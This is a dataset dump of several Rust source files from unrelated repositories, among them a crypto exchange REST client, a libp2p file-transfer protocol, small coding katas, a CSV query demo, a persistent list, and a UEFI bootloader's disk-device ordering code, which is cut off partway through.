blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 5
140
| path
stringlengths 5
183
| src_encoding
stringclasses 6
values | length_bytes
int64 12
5.32M
| score
float64 2.52
4.94
| int_score
int64 3
5
| detected_licenses
listlengths 0
47
| license_type
stringclasses 2
values | text
stringlengths 12
5.32M
| download_success
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|
d74fa7168aff61583ae1368cafa38da203a5f148
|
Rust
|
hooops/crypto-crawler-rs
|
/crypto-rest-client/src/exchanges/ftx.rs
|
UTF-8
| 1,432 | 2.75 | 3 |
[
"Apache-2.0"
] |
permissive
|
use super::utils::http_get;
use crate::error::Result;
use std::collections::BTreeMap;
const BASE_URL: &str = "https://ftx.com/api";
/// The RESTful client for FTX.
///
/// FTX has Spot, LinearFuture, LinearSwap, Option, Move and BVOL markets.
///
/// * RESTful API doc: <https://docs.ftx.com/?python#rest-api>
/// * Trading at <https://ftx.com/markets>
/// * Rate Limits: <https://docs.ftx.com/?python#rate-limits>
/// * Non-order placement requests do not count towards rate limits.
/// * Rate limits are tiered by account trading volumes.
pub struct FtxRestClient {
    // Credentials are stored but unused so far: only public endpoints
    // are implemented. The underscore prefix silences dead-code lints.
    _api_key: Option<String>,
    _api_secret: Option<String>,
}
impl FtxRestClient {
    /// Creates a new client.
    ///
    /// Both credentials are optional; the endpoints below are public
    /// and do not use them.
    pub fn new(api_key: Option<String>, api_secret: Option<String>) -> Self {
        FtxRestClient {
            _api_key: api_key,
            _api_secret: api_secret,
        }
    }
    /// Get the latest Level2 snapshot of orderbook.
    ///
    /// Top 100 bids and asks are returned.
    ///
    /// For example: <https://ftx.com/api/markets/BTC-PERP/orderbook?depth=100>,
    /// <https://ftx.com/api/markets/BTC/USD/orderbook?depth=100>
    pub fn fetch_l2_snapshot(symbol: &str) -> Result<String> {
        gen_api!(format!("/markets/{}/orderbook?depth=100", symbol))
    }
    /// Get open interest.
    ///
    /// For example:
    /// - <https://ftx.com/api/futures>
    pub fn fetch_open_interest() -> Result<String> {
        gen_api!("/futures")
    }
}
| true |
83af5dc9ca017d01cf46692a0afea426a3bf5afd
|
Rust
|
ccin2p3/actiondb
|
/src/matcher/pattern/pattern.rs
|
UTF-8
| 1,678 | 2.765625 | 3 |
[] |
no_license
|
use uuid::Uuid;
use serde::json;
use serde;
use matcher::trie::node::{CompiledPattern, TokenType};
use super::testmessage::TestMessage;
use std::borrow::Borrow;
/// A named, UUID-identified message pattern plus optional test messages.
#[derive(Clone, Debug)]
pub struct Pattern {
    // Optional human-readable name; `uuid` is the canonical identifier.
    name: Option<String>,
    uuid: Uuid,
    // Token sequence consumed front-first by `pop_first_token`.
    pattern: CompiledPattern,
    // Sample messages for validating the pattern; popped one at a time.
    test_messages: Option<Vec<TestMessage>>
}
impl Pattern {
    /// Creates an empty, unnamed pattern with the given UUID.
    pub fn with_uuid(uuid: Uuid) -> Pattern {
        Pattern{
            uuid: uuid,
            name: None,
            pattern: Vec::new(),
            test_messages: None
        }
    }
    /// Creates a fully specified pattern.
    pub fn new(name: Option<String>, uuid: Uuid, pattern: CompiledPattern, test_messages: Option<Vec<TestMessage>>) -> Pattern {
        Pattern{
            uuid: uuid,
            name: name,
            pattern: pattern,
            test_messages: test_messages
        }
    }
    /// Creates an empty pattern with a freshly generated v4 UUID.
    pub fn with_random_uuid() -> Pattern {
        Pattern::with_uuid(Uuid::new_v4())
    }
    /// Returns the optional name as a borrowed `&str`.
    pub fn name(&self) -> Option<&str> {
        self.name.as_ref().map(|x| x.borrow())
    }
    pub fn uuid(&self) -> &Uuid {
        &self.uuid
    }
    pub fn pattern(&self) -> &CompiledPattern {
        &self.pattern
    }
    /// Deserializes a `Pattern` from a JSON document.
    pub fn from_json(doc: &str) -> Result<Pattern, serde::json::error::Error> {
        json::from_str::<Pattern>(doc)
    }
    pub fn set_pattern(&mut self, pattern: CompiledPattern) {
        self.pattern = pattern;
    }
    /// Removes and returns the first token.
    ///
    /// Panics if no tokens remain; guard with `has_more_tokens` first.
    pub fn pop_first_token(&mut self) -> TokenType {
        self.pattern.remove(0)
    }
    /// Returns `true` while there are still tokens to pop.
    ///
    /// Fixed: the previous implementation returned `is_empty()` directly,
    /// which is the exact inverse of what this method's name promises.
    pub fn has_more_tokens(&self) -> bool {
        !self.pattern.is_empty()
    }
    /// Removes and returns the last test message, or `None` when there
    /// are no test messages left (or none were provided).
    pub fn pop_test_message(&mut self) -> Option<TestMessage> {
        // `and_then` expresses the former `map_or(None, …)` directly.
        self.test_messages.as_mut().and_then(|x| x.pop())
    }
}
| true |
b43f69c5635b84b16052bc53c5cfacc8308ba751
|
Rust
|
igorline/substrate-treasury-demo
|
/node/src/members_config.rs
|
UTF-8
| 713 | 2.671875 | 3 |
[
"Unlicense"
] |
permissive
|
use serde::Deserialize;
use serde_json::Result;
use sp_core::crypto::{AccountId32, Ss58Codec};
/// One entry from the embedded `user_accounts.json` members file.
#[derive(Deserialize)]
struct Member {
    /// SS58 Encoded public key
    address: String,
}
/// Parses the member list embedded at compile time from
/// `user_accounts.json` (two directories above this crate).
fn parse_members_json() -> Result<Vec<Member>> {
    let data = include_str!("../../user_accounts.json");
    serde_json::from_str(data)
}
/// Decodes an SS58-encoded address string into an `AccountId32`.
///
/// Panics with a descriptive message when the input is not valid SS58.
pub fn decode_address(address: String) -> AccountId32 {
    let encoded: &str = address.as_ref();
    AccountId32::from_ss58check(encoded).expect("failed to decode account id")
}
/// Returns the decoded account ids of all configured initial members.
///
/// Panics if the embedded JSON cannot be parsed or any address is invalid.
pub fn initial_members() -> Vec<AccountId32> {
    let parsed = parse_members_json().expect("failed parsing members data");
    let mut accounts = Vec::with_capacity(parsed.len());
    for member in parsed {
        accounts.push(decode_address(member.address));
    }
    accounts
}
| true |
7a85220def219477b148be5b99d3e0919fbe320b
|
Rust
|
sireliah/p2pshare
|
/src/protocol.rs
|
UTF-8
| 6,214 | 2.671875 | 3 |
[] |
no_license
|
use async_std::fs::File as AsyncFile;
use async_std::io as asyncio;
use crypto::digest::Digest;
use crypto::sha1::Sha1;
use futures::prelude::*;
use libp2p::core::{InboundUpgrade, OutboundUpgrade, UpgradeInfo};
use std::fs::File;
use std::io::{BufReader, Read};
use std::time::{Instant, SystemTime, UNIX_EPOCH};
use std::{io, iter, pin::Pin};
const CHUNK_SIZE: usize = 4096;
/// A file queued for sending: display name plus filesystem path.
pub struct FileToSend {
    pub name: String,
    pub path: String,
}
/// Outcome of a transfer-protocol upgrade.
#[derive(Clone, Debug)]
pub enum ProtocolEvent {
    /// A file was received and written to disk.
    Received {
        name: String,
        path: String,
        hash: String,
        size_bytes: usize,
    },
    /// An outbound transfer completed.
    Sent,
}
/// Metadata for a transferred file; also acts as the libp2p upgrade
/// type for the `/transfer/1.0` protocol (see the impls below).
#[derive(Clone, Debug, Default)]
pub struct TransferPayload {
    pub name: String,
    pub path: String,
    pub hash: String,
    pub size_bytes: usize,
}
impl TransferPayload {
    /// Creates a payload from the transferred file's metadata.
    pub fn new(name: String, path: String, hash: String, size_bytes: usize) -> TransferPayload {
        TransferPayload {
            name,
            path,
            hash,
            size_bytes,
        }
    }
    /// Verifies the file on disk against the expected hash.
    ///
    /// # Errors
    ///
    /// Returns the underlying I/O error when the file cannot be opened
    /// or read, and `InvalidData` when the hash does not match.
    pub fn check_file(&self) -> Result<(), io::Error> {
        let mut contents = vec![];
        let mut file = BufReader::new(File::open(&self.path)?);
        // Propagate read failures instead of panicking; this function
        // already returns io::Result, so `?` is the right tool here.
        file.read_to_end(&mut contents)?;
        let hash_from_disk = hash_contents(&mut contents);
        if hash_from_disk != self.hash {
            Err(io::Error::new(
                io::ErrorKind::InvalidData,
                "File corrupted!",
            ))
        } else {
            Ok(())
        }
    }
}
impl UpgradeInfo for TransferPayload {
    type Info = &'static str;
    type InfoIter = iter::Once<Self::Info>;
    /// Advertises the single protocol name used during negotiation.
    fn protocol_info(&self) -> Self::InfoIter {
        std::iter::once("/transfer/1.0")
    }
}
/// Returns the current monotonic instant; used to time transfers.
fn now() -> Instant {
    Instant::now()
}
/// Encodes one protocol header row: the value followed by a newline.
fn add_row(value: &str) -> Vec<u8> {
    let mut row = String::with_capacity(value.len() + 1);
    row.push_str(value);
    row.push('\n');
    row.into_bytes()
}
/// Computes the lowercase hex SHA-1 digest of `contents`.
///
/// Takes `&[u8]` instead of `&Vec<u8>` so any byte buffer can be
/// hashed; existing `&Vec<u8>` / `&mut Vec<u8>` call sites still
/// coerce via deref.
fn hash_contents(contents: &[u8]) -> String {
    let mut hasher = Sha1::new();
    hasher.input(contents);
    hasher.result_str()
}
/// Reads one transfer from `socket`: two newline-terminated header rows
/// (name, expected hash) followed by the raw file bytes, which are
/// streamed to `/tmp/files/<unix-secs>_<name>`.
///
/// Returns a `TransferPayload` describing the stored file; `size_bytes`
/// is the number of content bytes read after the header rows.
async fn read_socket(
    socket: impl AsyncRead + AsyncWrite + Send + Unpin,
) -> Result<TransferPayload, io::Error> {
    let mut reader = asyncio::BufReader::new(socket);
    let mut payloads: Vec<u8> = vec![];
    let mut name: String = "".into();
    let mut hash: String = "".into();
    reader.read_line(&mut name).await?;
    reader.read_line(&mut hash).await?;
    let (name, hash) = (name.trim(), hash.trim());
    println!("Name: {}, Hash: {}", name, hash);
    let now = SystemTime::now();
    let timestamp = now.duration_since(UNIX_EPOCH).expect("Time failed");
    let path = format!("/tmp/files/{}_{}", timestamp.as_secs(), name);
    let mut file = asyncio::BufWriter::new(AsyncFile::create(&path).await?);
    let mut counter: usize = 0;
    loop {
        let mut buff = vec![0u8; CHUNK_SIZE];
        match reader.read(&mut buff).await {
            Ok(n) => {
                if n > 0 {
                    payloads.extend(&buff[..n]);
                    counter += n;
                    // Flush to disk in CHUNK_SIZE * 256 batches to
                    // bound in-memory buffering.
                    if payloads.len() >= (CHUNK_SIZE * 256) {
                        file.write_all(&payloads)
                            .await
                            .expect("Writing file failed");
                        file.flush().await?;
                        payloads.clear();
                    }
                } else {
                    // EOF: write whatever remains and stop reading.
                    file.write_all(&payloads).await.expect("Writing file failed");
                    file.flush().await?;
                    payloads.clear();
                    break;
                }
            }
            // Fixed: propagate the I/O error instead of panicking —
            // this function already returns io::Result.
            Err(e) => return Err(e),
        }
    }
    // Fixed: arguments were previously passed as (name, hash, path),
    // but `TransferPayload::new` expects (name, path, hash, size), so
    // the `path` and `hash` fields ended up swapped.
    let event = TransferPayload::new(
        name.to_string(),
        path,
        hash.to_string(),
        counter,
    );
    println!("Name: {}, Read {:?} bytes", name, counter);
    Ok(event)
}
impl<TSocket> InboundUpgrade<TSocket> for TransferPayload
where
    TSocket: AsyncRead + AsyncWrite + Send + Unpin + 'static,
{
    type Output = TransferPayload;
    type Error = asyncio::Error;
    type Future = Pin<Box<dyn Future<Output = Result<Self::Output, Self::Error>> + Send>>;
    /// Accepts an incoming transfer: reads the header rows and file
    /// contents from the socket and resolves with the stored payload.
    fn upgrade_inbound(self, socket: TSocket, _: Self::Info) -> Self::Future {
        Box::pin(async move {
            println!("Upgrade inbound");
            let start = now();
            let event = read_socket(socket).await?;
            println!("Finished {:?} ms", start.elapsed().as_millis());
            Ok(event)
        })
    }
}
impl<TSocket> OutboundUpgrade<TSocket> for TransferPayload
where
    TSocket: AsyncRead + AsyncWrite + Send + Unpin + 'static,
{
    type Output = ();
    type Error = asyncio::Error;
    type Future = Pin<Box<dyn Future<Output = Result<Self::Output, Self::Error>> + Send>>;
    /// Sends the file at `self.path`: name row, hash row, then the
    /// raw contents, and closes the socket.
    fn upgrade_outbound(self, mut socket: TSocket, _: Self::Info) -> Self::Future {
        Box::pin(async move {
            println!("Upgrade outbound");
            let start = now();
            println!("Name: {:?}, Path: {:?}", self.name, self.path);
            let file = AsyncFile::open(self.path).await.expect("File missing");
            let mut buff = asyncio::BufReader::new(&file);
            let mut contents = vec![];
            buff.read_to_end(&mut contents)
                .await
                .expect("Cannot read file");
            let hash = hash_contents(&contents);
            let name = add_row(&self.name);
            let checksum = add_row(&hash);
            // Fixed: `write` may write only part of the buffer; use
            // `write_all` so the header rows are never truncated.
            socket.write_all(&name).await.expect("Writing name failed");
            socket.write_all(&checksum).await?;
            socket.write_all(&contents).await.expect("Writing failed");
            socket.close().await.expect("Failed to close socket");
            println!("Finished {:?} ms", start.elapsed().as_millis());
            Ok(())
        })
    }
}
/// Outbound upgrades resolve with `()`; map that to `Sent`.
impl From<()> for ProtocolEvent {
    fn from(_: ()) -> Self {
        ProtocolEvent::Sent
    }
}
/// Inbound upgrades resolve with a payload; map it to `Received`.
impl From<TransferPayload> for ProtocolEvent {
    fn from(transfer: TransferPayload) -> Self {
        ProtocolEvent::Received {
            name: transfer.name,
            path: transfer.path,
            hash: transfer.hash,
            size_bytes: transfer.size_bytes,
        }
    }
}
| true |
5bd836e88bef2a393f0ed51a74a6b3f22dcbfbca
|
Rust
|
toddmath/exercism-rust
|
/queen-attack/src/lib.rs
|
UTF-8
| 692 | 3.40625 | 3 |
[] |
no_license
|
/// A validated board coordinate as (rank, file), each in 0..=7.
#[derive(Debug)]
pub struct ChessPosition(isize, isize);
/// A queen placed on the board at (row, col).
#[derive(Debug)]
pub struct Queen {
    row: isize,
    col: isize,
}
impl ChessPosition {
    /// Builds a position when both rank and file lie on the board
    /// (0..=7); returns `None` otherwise.
    pub fn new(rank: i32, file: i32) -> Option<Self> {
        let on_board = (0..=7).contains(&rank) && (0..=7).contains(&file);
        if on_board {
            Some(Self(rank as isize, file as isize))
        } else {
            None
        }
    }
}
impl Queen {
pub fn new(position: ChessPosition) -> Self {
Self {
row: position.0,
col: position.1,
}
}
pub fn can_attack(&self, other: &Queen) -> bool {
let dx = self.row - other.row;
let dy = self.col - other.col;
dx == 0 || dy == 0 || dx.abs() == dy.abs()
}
}
| true |
b8e4385a76f0e27f1edd9233feacdab067859d40
|
Rust
|
alexanderkjall/adventofcode2020
|
/src/day6.rs
|
UTF-8
| 1,638 | 3.40625 | 3 |
[] |
no_license
|
use std::collections::HashSet;
/// Solves both parts of day 6 and returns the answers as strings.
///
/// Reads the puzzle input from `res/day6-input`.
pub fn run() -> Result<(String, String), anyhow::Error> {
    let input: String = std::fs::read_to_string("res/day6-input")?.parse()?;
    let part_one = sum_unique(&input);
    let part_two = sum_and(&input);
    Ok((part_one.to_string(), part_two.to_string()))
}
/// Part 1: for each blank-line-separated group, count the distinct
/// answer characters (ignoring spaces and newlines), then sum.
fn sum_unique(input: &str) -> usize {
    let mut total = 0;
    for group in input.split("\n\n") {
        let answers: HashSet<char> = group
            .chars()
            .filter(|c| !matches!(c, ' ' | '\n'))
            .collect();
        total += answers.len();
    }
    total
}
/// Part 2: for each group, count the answers present on *every* line
/// of the group (set intersection across lines), then sum.
fn sum_and(input: &str) -> usize {
    let mut total = 0;
    for group in input.trim().split("\n\n") {
        // Start from the full alphabet and intersect with each line,
        // exactly as the original fold did.
        let mut common: HashSet<char> = ('a'..='z').collect();
        for line in group.split('\n') {
            let seen: HashSet<char> = line.chars().collect();
            common = common.intersection(&seen).copied().collect();
        }
        total += common.len();
    }
    total
}
// Part 1 example from the puzzle: groups answer 3 + 3 + 3 + 1 + 1 = 11.
// Fixed: the blank lines separating the five groups had been lost from
// the string literal, which made the expected value 11 unreachable.
#[test]
fn test_sum_unique() {
    let input = "abc

a
b
c

ab
ac

a
a
a
a

b";
    assert_eq!(11, sum_unique(input));
}
// Part 2 example from the puzzle: groups answer 3 + 0 + 1 + 1 + 1 = 6.
// Fixed: the blank lines separating the five groups had been lost from
// the string literal, which made the expected value 6 unreachable.
#[test]
fn test_sum_and() {
    let input = "abc

a
b
c

ab
ac

a
a
a
a

b
";
    assert_eq!(6, sum_and(input));
}
// Single line: every answered question is shared, so the count is 3.
#[test]
fn test_sum_and_1() {
    let input = "abc";
    assert_eq!(3, sum_and(input));
}
// Three lines with disjoint answers: the intersection is empty.
#[test]
fn test_sum_and_2() {
    let input = "a
b
c";
    assert_eq!(0, sum_and(input));
}
// Two lines sharing only 'a': the intersection has one element.
#[test]
fn test_sum_and_3() {
    let input = "ab
ac";
    assert_eq!(1, sum_and(input));
}
| true |
8461949bc7687ac905cd153e56276d5c59e41e27
|
Rust
|
hwchen/lemurdb
|
/src/bin/test_csv.rs
|
UTF-8
| 3,316 | 2.765625 | 3 |
[] |
no_license
|
#![recursion_limit = "1024"]
#[macro_use]
extern crate error_chain;
extern crate lemurdb;
use lemurdb::{Schema, DataType};
use lemurdb::executor::DbIterator;
use lemurdb::executor::io::CsvSource;
use lemurdb::executor::simplesort::SortOrder;
use lemurdb::executor::aggregate::{AggregateType};
// Error types generated by `error_chain`: bridges std I/O errors
// (foreign link) and lemurdb's own error chain (link).
mod error {
    use lemurdb;
    error_chain!{
        foreign_links {
            Io(::std::io::Error);
        }
        links {
            Lemur(lemurdb::error::Error, lemurdb::error::ErrorKind);
        }
    }
}
use error::*;
/// Entry point: runs the demo query and, on failure, prints the whole
/// error chain (plus backtrace when available) before exiting non-zero.
fn main() {
    if let Err(ref err) = run() {
        println!("error: {}", err);
        for e in err.iter().skip(1) {
            // Typo fix: message previously read " cause by:".
            println!(" caused by: {}", e);
        }
        if let Some(backtrace) = err.backtrace() {
            println!("backtrace: {:?}", backtrace);
        }
        ::std::process::exit(1);
    }
}
/// Builds and runs the demo query: joins test ratings to test movies on
/// movie id, sorts by title, counts ratings per title, and prints each
/// resulting record. Earlier experiments (sort/limit, plain aggregate)
/// are kept below as commented-out scenarios.
fn run() -> Result<()> {
    use lemurdb::DataType::*;
    // Schema of the ratings CSV: userId,movieId,rating,timestamp.
    let rating_schema = Schema{
        column_names: vec!["userId".to_owned(), "movieId".to_owned(), "rating".to_owned(), "timestamp".to_owned()],
        column_types: vec![Integer, Integer, Float, Integer],
    };
    // Schema of the movies CSV: movieId,title,genres.
    let movie_schema = Schema {
        column_names: vec!["movieId".to_owned(), "title".to_owned(), "genres".to_owned()],
        column_types: vec![Integer, Text(255), Text(255)],
    };
    // Test sort and limit
    // let mut query = CsvSource::new("ratings.csv".to_owned(), schema.clone())
    //     .simplesort(1, DataType::Integer, SortOrder::Ascending)
    //     .limit(50);
    //
    // while let Some(record) = query.next() {
    //     println!("{:?}", record.to_string(&schema));
    // }
    // test aggregate
    // let final_schema = Schema{
    //     column_names: vec!["movie_id".to_owned(), "rating count".to_owned()],
    //     column_types: vec![Integer, Integer],
    // };
    // let mut query = CsvSource::new("ratings.csv".to_owned(), schema.clone())
    //     .simplesort(1, DataType::Integer, SortOrder::Ascending)
    //     .aggregate(AggregateType::Count, 2, DataType::Float, Some(1));
    //
    // while let Some(record) = query.next() {
    //     println!("{:?}", record.to_string(&final_schema));
    // }
    // test join
    // NOTE(review): `joined_schema` is never used below; it appears to
    // document the shape of the join output. Confirm before removing.
    let joined_schema = Schema {
        column_names: vec![
            "userId".to_owned(),
            "movieId".to_owned(),
            "rating".to_owned(),
            "timestamp".to_owned(),
            "movieId".to_owned(),
            "title".to_owned(),
            "genres".to_owned()
        ],
        column_types: vec![
            Integer,
            Integer,
            Float,
            Integer,
            Integer,
            Text(255),
            Text(255),
        ],
    };
    // Schema of the final aggregated output: title and rating count.
    let agg_schema = Schema{
        column_names: vec!["title".to_owned(), "rating count".to_owned()],
        column_types: vec![Text(255), Integer],
    };
    let movies = CsvSource::new("test_data/test_movies.csv".to_owned(), movie_schema);
    // Join ratings.movieId (col 1) to movies.movieId (col 0), sort by
    // the joined title column (index 5), then count ratings per title.
    let mut query = CsvSource::new("test_data/test_ratings.csv".to_owned(), rating_schema)
        .nested_loops_join(movies,1, 0)
        .simplesort(5, DataType::Text(255), SortOrder::Ascending)
        .aggregate(AggregateType::Count, 2, DataType::Float, Some(5));
    while let Some(record) = query.next() {
        println!("{:?}", record.to_string(&agg_schema));
    }
    Ok(())
}
| true |
c444b6c7987608711e169ce8ae921f0a8a913c23
|
Rust
|
alex-dukhno/rust-tdd-katas
|
/persistent_list/src/day_03.rs
|
UTF-8
| 1,492 | 3.65625 | 4 |
[
"MIT"
] |
permissive
|
use std::rc::Rc;
type Link = Option<Rc<Node>>;
/// One immutable list cell, structurally shared between lists via `Rc`.
#[derive(PartialEq, Debug)]
struct Node {
    item: i32,
    next: Link,
}
impl Node {
    /// Allocates a new cell, returning it already wrapped as a `Link`.
    fn new(item: i32, next: Link) -> Link {
        Some(Rc::new(Node { item, next }))
    }
}
/// A persistent (immutable, structurally shared) singly linked list.
#[derive(PartialEq, Debug)]
pub struct List {
    head: Link,
}
impl List {
    /// The empty list.
    pub(crate) fn empty() -> List {
        List { head: None }
    }
    /// A reference to the first item, or `None` for the empty list.
    pub(crate) fn head(&self) -> Option<&i32> {
        match &self.head {
            Some(node) => Some(&node.item),
            None => None,
        }
    }
    /// The list without its first element; the empty list stays empty.
    pub(crate) fn tail(&self) -> List {
        let rest = match &self.head {
            Some(node) => node.next.clone(),
            None => None,
        };
        List { head: rest }
    }
    /// A new list with `item` in front, sharing `self`'s cells.
    pub(crate) fn prepend(&self, item: i32) -> List {
        List {
            head: Node::new(item, self.head.clone()),
        }
    }
}
#[cfg(test)]
mod tests {
    use super::*;
    // The empty list has no head.
    #[test]
    fn empty_list_head() {
        let empty = List::empty();
        assert_eq!(empty.head(), None);
    }
    // The tail of the empty list is still the empty list.
    #[test]
    fn empty_list_tail() {
        let empty = List::empty();
        assert_eq!(empty.tail(), List::empty());
    }
    // One prepend: head is the item, tail is empty.
    #[test]
    fn prepend_single_item() {
        let list = List::empty().prepend(1);
        assert_eq!(list.head(), Some(&1));
        assert_eq!(list.tail(), List::empty());
    }
    // Prepends stack LIFO: the last prepended item is the head.
    #[test]
    fn prepend_multiple_items() {
        let list = List::empty().prepend(1).prepend(2).prepend(3);
        assert_eq!(list.head(), Some(&3));
        assert_eq!(list.tail(), List::empty().prepend(1).prepend(2));
    }
}
| true |
fc2a01bdcf5d71a932a2f5349b75d932049ce00d
|
Rust
|
redox-os/bootloader
|
/src/os/uefi/device.rs
|
UTF-8
| 14,695 | 2.609375 | 3 |
[
"MIT"
] |
permissive
|
use alloc::{
string::String,
vec::Vec,
};
use core::{
fmt::Write,
mem,
ptr,
slice,
};
use uefi::{
Handle,
device::{
DevicePath,
DevicePathType,
DevicePathHardwareType,
DevicePathAcpiType,
DevicePathMessagingType,
DevicePathMediaType,
DevicePathBbsType,
DevicePathEndType,
},
guid::Guid,
};
use uefi_std::{
loaded_image::LoadedImage,
proto::Protocol,
};
use super::disk::DiskEfi;
/// Result of comparing two device paths node by node.
#[derive(Debug)]
enum DevicePathRelation {
    /// The paths are identical.
    This,
    /// The first path is a strict prefix (ancestor) of the second; the
    /// payload is the number of extra nodes remaining in the second
    /// path *after* the first divergent node was consumed.
    Parent(usize),
    /// The first path strictly extends (descends from) the second;
    /// payload counted as in `Parent`.
    Child(usize),
    /// The paths diverge at some node.
    None,
}
/// Compares two device paths node by node: `This` when equal,
/// `Parent`/`Child` when one is a strict prefix of the other, and
/// `None` when any node differs in type, sub-type, or data.
fn device_path_relation(a_path: &DevicePath, b_path: &DevicePath) -> DevicePathRelation {
    let mut a_iter = DevicePathIter::new(a_path);
    let mut b_iter = DevicePathIter::new(b_path);
    loop {
        match (a_iter.next(), b_iter.next()) {
            // Both exhausted together: identical paths.
            (None, None) => return DevicePathRelation::This,
            // `a` ran out first: it is an ancestor of `b`.
            (None, Some(_)) => return DevicePathRelation::Parent(b_iter.count()),
            // `b` ran out first: `a` descends from `b`.
            (Some(_), None) => return DevicePathRelation::Child(a_iter.count()),
            (Some((a_node, a_data)), Some((b_node, b_data))) => {
                if a_node.Type != b_node.Type {
                    return DevicePathRelation::None;
                }
                if a_node.SubType != b_node.SubType {
                    return DevicePathRelation::None;
                }
                if a_data != b_data {
                    return DevicePathRelation::None;
                }
            }
        }
    }
}
/// A block I/O handle together with its protocol implementations.
pub struct DiskDevice {
    pub handle: Handle,
    pub disk: DiskEfi,
    pub device_path: DevicePathProtocol,
}
/// Enumerates all block I/O devices, ordered so the most likely boot
/// devices come first: sibling partitions of the disk holding the ESP
/// (excluding the ESP itself), then the boot disk(s) themselves, then
/// every remaining device. Returns an empty list when the required
/// protocols cannot be located.
pub fn disk_device_priority() -> Vec<DiskDevice> {
    // Get the handle of the partition this program was loaded from, which should be the ESP
    let esp_handle = match LoadedImage::handle_protocol(std::handle()) {
        Ok(loaded_image) => loaded_image.0.DeviceHandle,
        Err(err) => {
            log::warn!("Failed to find LoadedImage protocol: {:?}", err);
            return Vec::new();
        }
    };
    // Get the device path of the ESP
    let esp_device_path = match DevicePathProtocol::handle_protocol(esp_handle) {
        Ok(ok) => ok,
        Err(err) => {
            log::warn!("Failed to find device path protocol on {:?}: {:?}", esp_handle, err);
            return Vec::new();
        }
    };
    // Get all block I/O handles along with their block I/O implementations and device paths
    let handles = match DiskEfi::locate_handle() {
        Ok(ok) => ok,
        Err(err) => {
            log::warn!("Failed to find block I/O handles: {:?}", err);
            Vec::new()
        }
    };
    let mut devices = Vec::with_capacity(handles.len());
    for handle in handles {
        let disk = match DiskEfi::handle_protocol(handle) {
            Ok(ok) => ok,
            Err(err) => {
                // Handles without both protocols are skipped, not fatal.
                log::warn!("Failed to find block I/O protocol on {:?}: {:?}", handle, err);
                continue;
            }
        };
        let device_path = match DevicePathProtocol::handle_protocol(handle) {
            Ok(ok) => ok,
            Err(err) => {
                log::warn!("Failed to find device path protocol on {:?}: {:?}", handle, err);
                continue;
            }
        };
        devices.push(DiskDevice {
            handle,
            disk,
            device_path,
        });
    }
    // Find possible boot disks: devices whose path is the ESP's path
    // minus exactly one trailing node (i.e. the ESP's parent disk).
    let mut boot_disks = Vec::with_capacity(1);
    {
        let mut i = 0;
        while i < devices.len() {
            match device_path_relation(devices[i].device_path.0, esp_device_path.0) {
                DevicePathRelation::Parent(0) => {
                    // `remove` shifts the vector, so don't advance `i`.
                    boot_disks.push(devices.remove(i));
                    continue;
                },
                _ => (),
            }
            i += 1;
        }
    }
    // Find all children of possible boot devices
    let mut priority = Vec::with_capacity(devices.capacity());
    for boot_disk in boot_disks {
        let mut i = 0;
        while i < devices.len() {
            // Only prioritize non-ESP devices
            if devices[i].handle != esp_handle {
                match device_path_relation(devices[i].device_path.0, boot_disk.device_path.0) {
                    DevicePathRelation::Child(0) => {
                        priority.push(devices.remove(i));
                        continue;
                    },
                    _ => (),
                }
            }
            i += 1;
        }
        priority.push(boot_disk);
    }
    // Add any remaining devices
    priority.extend(devices);
    priority
}
/// Raw layout of a media/hard-drive device path node, read straight
/// from the node's data bytes with `ptr::read` (hence `repr(packed)`).
#[repr(packed)]
#[allow(dead_code)]
struct DevicePathHarddrive {
    partition_number: u32,
    partition_start: u64,
    partition_size: u64,
    partition_signature: [u8; 16],
    partition_format: u8,
    // Interpreted below as 1 = MBR (4-byte id), 2 = GPT (GUID).
    signature_type: u8,
}
/// Renders a device path as a human-readable, `/`-separated string,
/// loosely following the UEFI textual forms (`Pci(..)`, `Acpi(..)`,
/// `Sata(..)`, `Usb(..)`, `NVMe(..)`, `HD(..)`, file paths). Nodes of
/// unknown type fall back to a hex dump of type/sub-type/data.
pub fn device_path_to_string(device_path: &DevicePath) -> String {
    let mut s = String::new();
    for (node, node_data) in DevicePathIter::new(device_path) {
        // Little-endian integer readers over the node's raw data bytes.
        let read_u16 = |i: usize| -> u16 {
            (node_data[i] as u16) |
            (node_data[i + 1] as u16) << 8
        };
        let read_u32 = |i: usize| -> u32 {
            (node_data[i] as u32) |
            (node_data[i + 1] as u32) << 8 |
            (node_data[i + 2] as u32) << 16 |
            (node_data[i + 3] as u32) << 24
        };
        if ! s.is_empty() {
            s.push('/');
        }
        // NOTE(review): `write_result` is never checked. Writing into a
        // String cannot fail in practice, but the result is discarded.
        let write_result = match DevicePathType::try_from(node.Type) {
            Ok(path_type) => match path_type {
                DevicePathType::Hardware => match DevicePathHardwareType::try_from(node.SubType) {
                    Ok(sub_type) => match sub_type {
                        DevicePathHardwareType::Pci if node_data.len() == 2 => {
                            let func = node_data[0];
                            let dev = node_data[1];
                            write!(s, "Pci(0x{:X},0x{:X})", dev, func)
                        },
                        _ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
                    }
                    Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
                },
                DevicePathType::Acpi => match DevicePathAcpiType::try_from(node.SubType) {
                    Ok(sub_type) => match sub_type {
                        DevicePathAcpiType::Acpi if node_data.len() == 8 => {
                            let hid = read_u32(0);
                            let uid = read_u32(4);
                            // Low 16 bits 0x41D0 marks a compressed EISA/PNP id.
                            if hid & 0xFFFF == 0x41D0 {
                                write!(s, "Acpi(PNP{:04X},0x{:X})", hid >> 16, uid)
                            } else {
                                write!(s, "Acpi(0x{:08X},0x{:X})", hid, uid)
                            }
                        },
                        _ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
                    }
                    Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
                },
                DevicePathType::Messaging => match DevicePathMessagingType::try_from(node.SubType) {
                    Ok(sub_type) => match sub_type {
                        DevicePathMessagingType::Sata if node_data.len() == 6 => {
                            let hba_port = read_u16(0);
                            let multiplier_port = read_u16(2);
                            let logical_unit = read_u16(4);
                            // High bit set: no port multiplier, omit it.
                            if multiplier_port & (1 << 15) != 0 {
                                write!(s, "Sata(0x{:X},0x{:X})", hba_port, logical_unit)
                            } else {
                                write!(s, "Sata(0x{:X},0x{:X},0x{:X})", hba_port, multiplier_port, logical_unit)
                            }
                        },
                        DevicePathMessagingType::Usb if node_data.len() == 2 => {
                            let port = node_data[0];
                            let iface = node_data[1];
                            write!(s, "Usb(0x{:X},0x{:X})", port, iface)
